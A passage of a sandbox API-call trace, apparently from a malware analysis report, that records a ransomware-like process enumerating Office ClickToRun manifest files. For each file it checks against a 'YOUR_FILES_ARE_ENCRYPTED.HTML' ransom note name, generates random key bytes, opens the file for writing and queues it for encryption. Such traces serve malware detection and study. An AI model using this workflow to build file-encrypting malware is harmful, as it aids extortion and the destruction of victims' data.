out: param_1="ED") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B9") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="02") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="55") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0D") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3E") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="17") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="FF") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CC") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8D") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="38") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E6") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="D7") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="88") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8D") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B7") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A5") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="ED") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A6") returned 2 [0156.100] wsprintfW (in: 
param_1=0x4ebda92, param_2="%02X" | out: param_1="A2") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0D") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CF") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7A") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1E") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0156.100] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6B") returned 2 [0156.101] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" [0156.101] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.101] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.101] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7733d8f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, 
nFileSizeLow=0x15dd6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cAlternateFileName="C25956~1.XML")) returned 1 [0156.101] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned 125 [0156.101] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.103] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0156.103] lstrlenW (lpString=".xml") returned 4 [0156.103] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0156.103] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.103] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.127] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89558) returned 1 [0156.127] GetProcessHeap () returned 0x270000 [0156.127] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.128] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="92") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="88") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="55") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda42, 
param_2="%02X" | out: param_1="FA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C8") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="63") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A5") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A2") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="74") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AD") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="56") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="47") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="CF") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0D") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BE") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A6") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="04") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FA") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="82") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="57") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C8") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5E") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="77") returned 2 [0156.128] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="99") returned 2 [0156.129] lstrcpyW 
(in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" [0156.129] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.129] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.129] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77d0f3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml", cAlternateFileName="C2FCD6~1.XML")) returned 1 [0156.130] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned 115 [0156.130] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.130] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0156.130] lstrlenW (lpString=".xml") returned 4 [0156.131] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0156.131] SystemFunction036 (in: 
RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.131] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.143] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=23328) returned 1 [0156.143] GetProcessHeap () returned 0x270000 [0156.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.144] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" [0156.144] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.144] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.147] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77eb22d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, 
dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.officemui.msi.16.en-us.xml", cAlternateFileName="C29059~1.XML")) returned 1 [0156.147] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned 117 [0156.147] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.147] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0156.147] lstrlenW (lpString=".xml") returned 4 [0156.147] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0156.156] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.156] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.158] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=106882) returned 1 [0156.158] GetProcessHeap () returned 0x270000 [0156.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.158] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1F") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2E") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F1") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="37") returned 2 [0156.158] wsprintfW (in: 
param_1=0x4ebda46, param_2="%02X" | out: param_1="09") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D5") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="5A") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="92") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C0") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D9") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="97") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C1") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="88") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="91") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="93") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="6D") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="17") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="02") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="76") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="93") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C7") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="34") returned 2 
[0156.159] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9F") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="2D") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="06") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D3") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="03") returned 2 [0156.160] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" [0156.160] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77ed8430, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml", cAlternateFileName="C2467F~1.XML")) returned 1 [0156.172] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned 120 [0156.172] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.172] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0156.172] lstrlenW (lpString=".xml") returned 4 [0156.172] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0156.172] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.173] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0156.173] GetProcessHeap () returned 0x270000 [0156.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.174] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="82") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="81") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="29") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="4C") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5F") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1B") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: 
param_1="89") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E3") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B7") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B7") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="13") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="63") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3C") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E8") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FE") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EE") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="45") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FC") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="CF") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DC") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="81") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A6") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="52") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DC") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2D") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CB") returned 2 [0156.175] wsprintfW (in: 
param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7D") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C8") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4F") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0156.175] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" [0156.175] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.175] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77683730, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cAlternateFileName="C21839~1.XML")) returned 1 [0156.176] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned 131 [0156.176] lstrcmpW 
(lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.177] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0156.177] lstrlenW (lpString=".xml") returned 4 [0156.177] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0156.177] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.188] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=95944) returned 1 [0156.188] GetProcessHeap () returned 0x270000 [0156.188] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.192] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F5") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="29") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="78") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4F") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="8D") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="60") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="28") returned 